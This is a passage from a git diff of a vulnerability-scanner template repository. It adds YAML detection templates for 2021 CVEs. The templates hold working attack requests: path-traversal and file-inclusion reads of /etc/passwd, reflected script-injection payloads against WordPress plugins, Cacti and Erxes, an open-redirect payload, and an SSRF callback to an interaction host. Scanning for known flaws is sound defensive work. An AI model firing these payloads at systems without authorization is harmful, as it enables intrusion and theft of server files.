Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
name: http
|
||||
words:
|
||||
- "http"
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2021-25864
|
||||
|
||||
info:
|
||||
name: Hue Magic - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
|
||||
reference:
|
||||
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
|
||||
- https://www.cvedetails.com/cve/CVE-2021-25864
|
||||
metadata:
|
||||
shodan-query: title:"NODE-RED"
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-25864
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2021,huemagic,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,7 @@ info:
|
|||
author: dhiyaneshDk,philippedelteil
|
||||
severity: critical
|
||||
name: Confluence Server OGNL injection - RCE
|
||||
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
|
||||
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
|
||||
tags: cve,cve2021,rce,confluence,injection,ognl
|
||||
reference:
|
||||
- https://jira.atlassian.com/browse/CONFSERVER-67940
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2021-26247
|
||||
|
||||
info:
|
||||
name: Unauthenticated XSS Cacti - auth_changepassword.php
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: As an unauthenticated remote user, visit "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" to successfully execute the JavaScript payload present in the "ref" URL parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-26247
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-26247
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,cacti,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"></script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,13 +1,14 @@
|
|||
id: CVE-2021-26855
|
||||
|
||||
info:
|
||||
name: Exchange Server SSRF Vulnerability
|
||||
name: Microsoft Exchange Server SSRF Vulnerability
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: |
|
||||
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
||||
description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
|
||||
remediation: Apply the appropriate security update.
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft
|
||||
reference:
|
||||
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
|
||||
- https://proxylogon.com/#timeline
|
||||
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
||||
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
|
||||
|
@ -29,3 +30,4 @@ requests:
|
|||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
# Enhanced by mp on 2022/02/04
|
||||
|
|
|
@ -1,12 +1,17 @@
|
|||
id: CVE-2021-29156
|
||||
|
||||
info:
|
||||
name: LDAP Injection In Openam
|
||||
name: LDAP Injection In OpenAM
|
||||
author: melbadry9,xelkomy
|
||||
severity: high
|
||||
tags: cve,cve2021,openam,ldap,injection
|
||||
description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
|
||||
reference: https://blog.cybercastle.io/ldap-injection-in-openam/
|
||||
description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.
|
||||
remediation: Upgrade to OpenAM commercial version 13.5.1 or later.
|
||||
reference:
|
||||
https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md
|
||||
https://hackerone.com/reports/1278050
|
||||
https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/
|
||||
https://portswigger.net/research/hidden-oauth-attack-vectors
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
|
@ -24,3 +29,5 @@ requests:
|
|||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "jato.pageSession") && status_code==200'
|
||||
|
||||
# Enhanced by cs on 2022/01/24
|
||||
|
|
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2021-32618
|
||||
|
||||
info:
|
||||
name: Flask Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com will pass FS's relative URL check however many browsers will gladly convert this to http://example.com.
|
||||
reference:
|
||||
- https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
|
||||
- https://github.com/Flask-Middleware/flask-security/issues/486
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-32618
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-32618
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2021,redirect,flask
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login?next=\\\example.com'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2021-32682
|
||||
|
||||
info:
|
||||
name: elFinder - Multiple vulnerabilities leading to RCE
|
||||
author: smaranchand
|
||||
severity: critical
|
||||
tags: cve,cve2021,elfinder,misconfig,rce,oss
|
||||
description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.
|
||||
reference:
|
||||
- https://smaranchand.com.np/2022/01/organization-vendor-application-security/
|
||||
- https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
|
||||
- https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-32682
|
||||
remediation: Update to elFinder 2.1.59
|
||||
metadata:
|
||||
github: https://github.com/Studio-42/elFinder
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-32682
|
||||
cwe-id: CWE-22,CWE-78,CWE-918
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html"
|
||||
- "{{BaseURL}}/assets/elFinder/elfinder.html"
|
||||
- "{{BaseURL}}/backend/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html"
|
||||
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html"
|
||||
- "{{BaseURL}}/uploads/elfinder/elfinder-cke.html"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "elfinder"
|
||||
- "php/connector"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2021-32853
|
||||
|
||||
info:
|
||||
name: Erxes <= v0.23.0 XSS
|
||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag.
|
||||
reference:
|
||||
- https://securitylab.github.com/advisories/GHSL-2021-103-erxes/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3285
|
||||
metadata:
|
||||
shodan-query: http.title:"erxes"
|
||||
tags: cve,cve2021,xss,erxes,oss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'topic_id: "</script><script>alert(document.domain)</script>'
|
||||
- "window.erxesEnv"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-34640
|
||||
|
||||
info:
|
||||
name: Securimage-WP-Fixed <= 3.5.4 - Reflected Cross-Site Scripting (XSS)
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: The Securimage-WP-Fixed WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.5.4.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-34640
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-34640
|
||||
cwe-id: CWE-79
|
||||
tags: wordpress,cve,cve2021,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET //wp-admin/options-general.php/"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-34643
|
||||
|
||||
info:
|
||||
name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34643
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-34643
|
||||
cwe-id: CWE-79
|
||||
tags: wordpress,cve,cve2021,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/options-general.php/</script><script>alert(document.domain)</script>/?page=skatubazar_option HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -4,8 +4,9 @@ info:
|
|||
name: PrestaShop SmartBlog SQL Injection
|
||||
author: whoever
|
||||
severity: critical
|
||||
description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality.
|
||||
description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.
|
||||
tags: cve,cve2021,prestashop,smartblog,sqli
|
||||
remediation: Apply the fix.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538
|
||||
- https://blog.sorcery.ie/posts/smartblog_sqli/
|
||||
|
@ -30,3 +31,5 @@ requests:
|
|||
words:
|
||||
- "c5fe25896e49ddfe996db7508cf00534"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/02/08
|
||||
|
|
|
@ -13,7 +13,7 @@ info:
|
|||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.30
|
||||
cve-id: CVE-2021-38314
|
||||
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
|
||||
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site's `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-39322
|
||||
|
||||
info:
|
||||
name: Easy Social Icons < 3.0.9 - Reflected Cross-Site Scripting
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-39322
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-39322
|
||||
cwe-id: CWE-79
|
||||
tags: wordpress,cve,cve2021,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-39350
|
||||
|
||||
info:
|
||||
name: FV Flowplayer Video Player WordPress plugin - Authenticated Reflected XSS
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts, in versions 7.5.0.727 - 7.5.2.727.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-39350
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-39350
|
||||
cwe-id: CWE-79
|
||||
tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2021-39433
|
||||
|
||||
info:
|
||||
name: BIQS IT Biqs-drive v1.83 LFI
|
||||
author: Veshraj
|
||||
severity: high
|
||||
description: A local file inclusion (LFI) vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.
|
||||
reference:
|
||||
- https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433
|
||||
tags: lfi,biqsdrive,cve,cve2021
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.50
|
||||
cve-id: CVE-2021-39433
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,95 @@
|
|||
id: CVE-2021-40323
|
||||
|
||||
info:
|
||||
name: Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method
|
||||
severity: critical
|
||||
author: c-sh0
|
||||
reference:
|
||||
- https://github.com/cobbler/cobbler/issues/2795
|
||||
- https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40323
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-40323
|
||||
cwe-id: CWE-94
|
||||
tags: cve,cve2021,cobbler,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST {{BaseURL}}/cobbler_api HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml
|
||||
|
||||
<?xml version='1.0'?>
|
||||
<methodCall>
|
||||
<methodName>find_profile</methodName>
|
||||
<params>
|
||||
<param>
|
||||
<value>
|
||||
<struct>
|
||||
<member>
|
||||
<name>name</name>
|
||||
<value>
|
||||
<string>*</string>
|
||||
</value>
|
||||
</member>
|
||||
</struct>
|
||||
</value>
|
||||
</param>
|
||||
</params>
|
||||
</methodCall>
|
||||
|
||||
- |
|
||||
POST {{BaseURL}}/cobbler_api HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml
|
||||
|
||||
<?xml version='1.0'?>
|
||||
<methodCall>
|
||||
<methodName>generate_script</methodName>
|
||||
<params>
|
||||
<param>
|
||||
<value>
|
||||
<string>{{profile}}</string>
|
||||
</value>
|
||||
</param>
|
||||
<param>
|
||||
<value>
|
||||
<string></string>
|
||||
</value>
|
||||
</param>
|
||||
<param>
|
||||
<value>
|
||||
<string>/etc/passwd</string>
|
||||
</value>
|
||||
</param>
|
||||
</params>
|
||||
</methodCall>
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: profile
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- '<value><string>(.*?)</string></value>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/xml'
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0"
|
||||
- "bin:.*:1"
|
||||
- "nobody:.*:99"
|
||||
condition: or
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue